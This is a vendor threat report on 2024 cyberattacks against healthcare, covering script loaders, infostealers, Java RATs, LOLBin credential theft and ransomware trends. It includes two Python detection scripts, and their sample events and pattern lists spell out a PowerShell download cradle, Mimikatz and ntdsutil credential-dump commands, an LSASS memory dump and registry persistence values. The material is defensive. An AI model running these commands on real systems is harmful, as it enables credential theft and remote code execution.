2025 Cyber Threat Report
Threats Targeting the Healthcare Sector
Overview

Throughout 2024, threat actors were busier than ever, adapting quickly and deploying
more advanced tools and tactics across industries like technology, education,
government, and manufacturing. Healthcare was among the hardest hit.
Sophisticated attack methods once reserved for large corporations were used against
healthcare organizations of all sizes, from small regional providers to massive
hospital systems. The stakes have never been higher, as these attacks put critical
systems and patient data at risk.
Healthcare Faces Unique Risks

The healthcare sector has consistently been a prime target for threat actors, and
2024 proved no different. The combination of sensitive patient data, outdated
legacy systems, and fragmented IT environments makes healthcare especially
vulnerable to specific types of cyberattacks, including:

Script-Based Exploits: The top threat in 2024. These scripts often serve as delivery
mechanisms for ransomware or data exfiltration, and because they run inside
legitimate interpreters such as PowerShell and WScript they frequently slip past
traditional, signature-based security controls.

Infostealers: As the name implies, these are malicious programs designed to extract
sensitive information. With its wealth of protected health information (PHI) and
critical operational data, the healthcare sector has become a prime target for
these threats.

Malware: Attackers deploy various types of malware, including fileless threats, to
disrupt operations or establish persistent network access.
Unfortunately, healthcare is a prime target for the most malicious hackers, drawn
to its wealth of sensitive data. Our latest findings reveal the tactics threat actors
are using to try to infiltrate organizations like yours. Here, we’re giving you the
information you need to understand these risks and stay ahead of emerging threats.
Attack Breakdown

Healthcare Is a Top Target

Threat actors set their sights on a range of industries throughout 2024, but none so
much as healthcare and education. Hackers focused most of their attacks on healthcare
and educational facilities, with these two industries making up 38% of all incidents.
Cyberattacks on technology companies, manufacturing, and government comprised almost
a third of all incidents.

Figure 1: Industries targeted by percentage in 2024

Industry        Share of incidents
Education       21%
Healthcare      17%
Technology      12%
Government      11%
Manufacturing    9%
Other           30%
Threats by Industry
Each industry faced its own distinct threats,
with the most common attack methods being
malicious scripts, remote access trojan (RAT)
deployments, and abuse of remote monitoring and
management (RMM) tools.
Healthcare environments were particularly
vulnerable to script-based attacks and exploitation
of legacy systems. Ransomware was also a
consistent threat across industries, healthcare
included. With cryptocurrency prices skyrocketing
in the latter part of the year, threat actors were
more brazen with their attacks, even against non-
enterprise environments. These findings mean that
healthcare organizations of all sizes need tailored
defenses and proactive measures to address their
unique vulnerabilities.
Figure 2: Threat frequency by industry in 2024 (heatmap of incident counts per
industry, Healthcare, Technology, Education, Government, Manufacturing and Other,
for each threat type: Infostealer, RAT, Ransomware, Malware, Hacking Tool, RMM
Abuse, Malicious Script, Lateral Movement and Other; the individual cell values
are not reproduced here)

An example of persistent malware at a healthcare diagnostic center (chain shown
alongside Figure 2): persistence via the Startup folder, which executes a .LNK
file; persistence via a Windows service; infostealer.
Healthcare Sector Threats

In 2024, the biggest risk for the healthcare industry was malicious script
execution. These were primarily scripts abused for persistence, such as the
JavaScript components of malware, downloaders, and system-analysis components
run to profile the host before fetching additional components. Because Huntress
intercepted most of these malicious scripts before they completed, we could not
positively associate many of them with a specific malware family.

Most of these incidents appear to be related to infostealers like Gootloader and
to the misuse of PowerShell components for obfuscation or anti-analysis,
including techniques such as modifying Windows Event Logs or running searches
on the host. The most common action taken by these scripts was modifying or
querying the Windows Registry, either to collect data for exfiltration or to
establish persistence through autorun keys or COM object modifications. The
second most frequent goal was downloading further components, originating from
PowerShell or WScript. Many of these downloaders fetched other malware
components, while a few fetched packages that installed RATs.
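The registry-based persistence described here (autorun keys and COM object modifications), together with the Startup folder .LNK and Windows service persistence shown alongside Figure 2, can be hunted from endpoint telemetry. The Python below is an added example written for this page, not Huntress code or detection content; it scores Sysmon-style registry value-set (Event ID 13) and file-create (Event ID 11) records, with every event constructed inline. The lower-cased field names, the made-up CLSID and paths, the score weights and the alert threshold are all assumptions chosen for the example.

```python
import re

# Constructed Sysmon-style records (not real telemetry). Field names follow
# Sysmon's RegistryEvent (ID 13: Image, TargetObject, Details) and FileCreate
# (ID 11: Image, TargetFilename) layouts, lower-cased for brevity.
EVENTS = [
    # A WScript-run JavaScript drops itself into the user's Run key.
    {"id": 13, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"wscript.exe //e:jscript C:\Users\jdoe\AppData\Roaming\upd.js"},
    # COM hijack: a per-user CLSID's InprocServer32 repointed at a DLL in Temp
    # (the CLSID is made up for the example).
    {"id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\CLSID\{0A1B2C3D-1111-2222-3333-444455556666}\InprocServer32\(Default)",
     "details": r"C:\Users\jdoe\AppData\Local\Temp\shell.dll"},
    # PowerShell writes a shortcut into the Startup folder.
    {"id": 11, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\report.lnk"},
    # Benign: a vendor installer registering its own agent under HKLM.
    {"id": 13, "image": r"C:\Program Files\Vendor\Setup.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "details": r"C:\Program Files\Vendor\agent.exe"},
    # New service whose binary lives in ProgramData (services.exe writes the key).
    {"id": 13, "image": r"C:\Windows\System32\services.exe",
     "target": r"HKLM\SYSTEM\CurrentControlSet\Services\WinUpdSvc\ImagePath",
     "details": r"C:\ProgramData\svc\winupd.exe"},
    # Benign file write that should not match any rule.
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\jdoe\Documents\notes.txt"},
]

# Script hosts and other living-off-the-land binaries that rarely have a
# legitimate reason to write persistence locations themselves.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "reg.exe"}
# Directories an unprivileged user (or a dropper running as one) can write to.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)

# (rule name, Sysmon event id, pattern over the registry path or file name)
RULES = [
    ("RUN_KEY", 13, re.compile(r"\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.I)),
    ("COM_HIJACK", 13, re.compile(
        r"\\CLSID\\\{[0-9A-F-]{36}\}\\(InprocServer32|LocalServer32)\\", re.I)),
    ("SERVICE_IMAGE", 13, re.compile(r"\\CurrentControlSet\\Services\\[^\\]+\\ImagePath$", re.I)),
    ("STARTUP_LNK", 11, re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)),
]


def hunt(events, threshold=60):
    """Score every event that touches a persistence location.

    Base score 40 for touching the location at all, +30 when the writer is a
    script host or LOLBin, +30 when the value data (or the dropped file) points
    into a user-writable directory. Weights and threshold are assumptions for
    this example, not a vendor default.
    """
    findings = []
    for ev in events:
        for name, event_id, pattern in RULES:
            if ev["id"] != event_id or not pattern.search(ev["target"]):
                continue
            writer = ev["image"].rsplit("\\", 1)[-1].lower()
            data = ev.get("details", ev["target"])  # file events carry no Details
            score = 40
            score += 30 if writer in SCRIPT_HOSTS else 0
            score += 30 if USER_WRITABLE.search(data) else 0
            findings.append({"rule": name, "score": score, "alert": score >= threshold,
                             "writer": writer, "target": ev["target"], "data": data})
    return findings


def alerts(events, threshold=60):
    """Only the findings that cross the threshold."""
    return [f for f in hunt(events, threshold) if f["alert"]]


if __name__ == "__main__":
    for f in hunt(EVENTS):
        flag = "ALERT" if f["alert"] else "info "
        print(f"{flag} {f['score']:3d} {f['rule']:<14} {f['writer']:<15} {f['data']}")
```

Run as a script it prints one line per finding. The vendor installer's HKLM Run entry is reported at score 40 without alerting, while the service whose ImagePath points into ProgramData crosses the threshold on the path alone even though services.exe is the writer, which is the case the scoring is meant to keep visible.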
While there do not appear to be any RAT tools geared explicitly toward
healthcare, many of those we saw rely on Java. Most environments have removed
Java, but the healthcare industry still depends on Java applications and
development for many medical technologies and software suites. Attackers know
this and take advantage of these overlooked areas, deploying JRat/Adwind and
STRRAT at higher frequencies than in other industries. JavaScript-based attacks
are also common in healthcare, where suspicious JavaScript execution patterns
and child-process rules were triggered in the majority of incidents. Though most
of these are generic malware components, some appear to be related to the
Gootloader or SocGholish JavaScript loaders.
Threats Targeting Healthcare

Figure 3: Healthcare threats by type in 2024

Threat type         Share
Infostealer         19%
RAT                  7%
Ransomware           8%
Malware             16%
Hacking Tool         4%
RMM Abuse            9%
Malicious Script    22%
Lateral Movement     4%
Other               11%
Attackers orient themselves quickly once inside a healthcare network: more than
38% of hands-on-keyboard (HOK) activity in these environments was network or
domain reconnaissance. In many cases this was the first HOK activity we saw,
after infostealers or other scripts had already identified the domain; a human
operator then accessed the infected machine remotely. Lateral movement in
healthcare, when not automated, was most often achieved with hacking tools,
primarily Mimikatz, or by abusing known LOLBins (ntdsutil, diskshadow, and
rdrleakdiag were the most common) to recover cached credentials. Note that these
three work differently: rdrleakdiag dumps a process's memory (typically LSASS),
while ntdsutil and diskshadow copy the Active Directory database out of a
domain controller, so a detection that only watches for LSASS access will miss
the latter two.
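Both of the hands-on patterns this report describes, script hosts and Java launching downloaders or RAT payloads (from the Healthcare Sector Threats section above) and credential dumping through Mimikatz or the LOLBins named here, surface in process-creation telemetry. The Python below is an added example written for this page, not Huntress detection logic; it runs a small rule set over constructed Sysmon-style process-creation (Event ID 1) records built inline. The rule names, sample command lines, file paths, PIDs and the 192.0.2.10 address are all assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# Paths, PIDs and the 192.0.2.10 address are made up for the example.
EVENTS = [
    # wscript-launched JavaScript spawns a PowerShell download cradle.
    {"pid": 4100, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://192.0.2.10/a.ps1')\""},
    # The JavaScript itself, run from the Downloads folder.
    {"pid": 4101, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\jdoe\Downloads\invoice.js"},
    # Java RAT style launch: a JAR executed out of the user's roaming profile.
    {"pid": 4102, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "cmdline": r"javaw.exe -jar C:\Users\jdoe\AppData\Roaming\Oracle\bin\jre.jar"},
    # LOLBin credential theft: NTDS.dit via ntdsutil, a shadow copy via diskshadow,
    # an LSASS memory dump via rdrleakdiag, and a renamed Mimikatz.
    {"pid": 4103, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\x" q q'},
    {"pid": 4104, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\diskshadow.exe",
     "cmdline": r"diskshadow.exe /s C:\Windows\Temp\s.txt"},
    {"pid": 4105, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rdrleakdiag.exe",
     "cmdline": r"rdrleakdiag.exe /p 672 /o C:\Windows\Temp /fullmemdmp /wait 1"},
    {"pid": 4106, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\mk.exe",
     "cmdline": r'mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    # Benign: a vendor's Java viewer and a scheduled maintenance script.
    {"pid": 4107, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "cmdline": r'javaw.exe -jar "C:\Program Files\Vendor\Viewer\viewer.jar"'},
    {"pid": 4108, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Vendor\maint.ps1"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
JAVA = {"java.exe", "javaw.exe"}
# Children a script host has little reason to spawn on a clinical workstation.
SCRIPT_CHILDREN = POWERSHELL | {"cmd.exe", "mshta.exe", "rundll32.exe",
                                "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
SCRIPT_FILE = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|-enc(odedcommand)?\b|FromBase64String", re.I)

# Command-line rules: (rule name, required image basename or None, pattern).
CMDLINE_RULES = [
    ("NTDSUTIL_IFM", "ntdsutil.exe", re.compile(r"\bifm\b.*\bcreate\s+full\b", re.I)),
    ("DISKSHADOW_SCRIPT", "diskshadow.exe", re.compile(r"\s[/-]s\s", re.I)),
    ("RDRLEAKDIAG_DUMP", "rdrleakdiag.exe", re.compile(r"/fullmemdmp", re.I)),
    # Mimikatz is routinely renamed, so key on its module syntax, not the image.
    ("MIMIKATZ_SYNTAX", None, re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) pairs in event order; one event may hit several rules."""
    hits = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["cmdline"]
        if parent in SCRIPT_HOSTS and image in SCRIPT_CHILDREN:
            hits.append(("SCRIPT_HOST_CHILD", ev["pid"]))
        if image in SCRIPT_HOSTS and SCRIPT_FILE.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append(("SCRIPT_FROM_USER_DIR", ev["pid"]))
        if image in POWERSHELL and DOWNLOAD_CRADLE.search(cmd):
            hits.append(("PS_DOWNLOAD_CRADLE", ev["pid"]))
        # Java is expected on healthcare hosts, so only a JAR run from a
        # user-writable path is flagged; the vendor viewer under Program Files stays quiet.
        if image in JAVA and "-jar" in cmd.lower() and USER_WRITABLE.search(cmd):
            hits.append(("JAR_FROM_USER_DIR", ev["pid"]))
        for name, want_image, pattern in CMDLINE_RULES:
            if (want_image is None or image == want_image) and pattern.search(cmd):
                hits.append((name, ev["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{pid} {rule}")
```

The cradle pattern deliberately requires a word boundary after `-enc`, so PowerShell's unrelated `-Encoding` parameter does not trip it, and the Mimikatz rule ignores the image name entirely because the binary is almost always renamed before use.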
Ransomware in the healthcare industry is slowly shifting from traditional
decryption-based ransoms toward data theft and extortion. We are seeing this trend
elsewhere, as attackers develop these tactics to defeat protections against file
encryption, a key defense for thwarting traditional ransomware. Throughout 2024,
INC/Lynx and RansomHub were the primary groups that targeted hospitals and other
medical services. In many cases the ransomware was deployed by threat groups
such as Vanilla Tempest, which often partnered with INC and dropped its
ransomware on victims only after gaining access and exfiltrating the data it
was after.
Figure 4: Healthcare hands-on-keyboard activity in 2024

Activity                 Share
Network Enumeration      38%
Lateral Movement         22%
Credential Harvesting    14%
Persistence              11%
Exfiltration              7%
Defense Evasion           6%
Other                     2%
Conclusion
The healthcare sector is facing a growing wave of cyber threats. In 2024, attackers
used advanced techniques that were once aimed at large enterprises and
repurposed them to target healthcare organizations of all sizes. Given the reliance
on legacy systems and the high value of PHI, healthcare has become a prime target
for the most ruthless threat actors.
Key threats like malicious scripts, infostealers, and RATs highlight how attackers
exploit overlooked vulnerabilities, such as Java dependencies, outdated systems,
and fragmented IT environments. Additionally, the rise of data theft and extortion
as a replacement for traditional file encryption-based ransomware poses a
growing challenge.
To defend against rising cyber threats, healthcare organizations must adopt
proactive and layered security strategies. Essential measures include deploying
advanced endpoint monitoring to catch threats early and regularly patching systems
to reduce vulnerabilities. Equally important are comprehensive incident response
plans and ongoing employee training to minimize human error and ensure swift
recovery from attacks.
The TL;DR: Stay vigilant and resilient because cyber threats won’t stop evolving.
About Huntress
Founded in 2015 by former NSA cyber operators, Huntress protects over 3 million
endpoints and 1 million identities worldwide, elevating under-resourced IT and
security teams and empowering them with protection that works as hard as they
do. Powered by a 24/7 team of expert security analysts and researchers, our
enterprise-grade, fully owned technology is built for all businesses, not just the 1%
with big budgets.
With fully managed EDR, ITDR, and SIEM solutions and Security Awareness Training,
the Huntress platform helps end users quickly deploy and manage real-time
protection for endpoints, email, and employees, all from a single dashboard.
Huntress exists to level the cybersecurity playing field and elevate our community
through award-winning technology and world-class people. We’re ethical badasses
who love what we do: wrecking hackers and protecting businesses from real threats.
Learn More
Huntress Protects Healthcare
Malicious hackers are focused on healthcare, but you don't have to face them
alone. Huntress combines purpose-built tech and people-powered security to
keep your organization and your patients safe.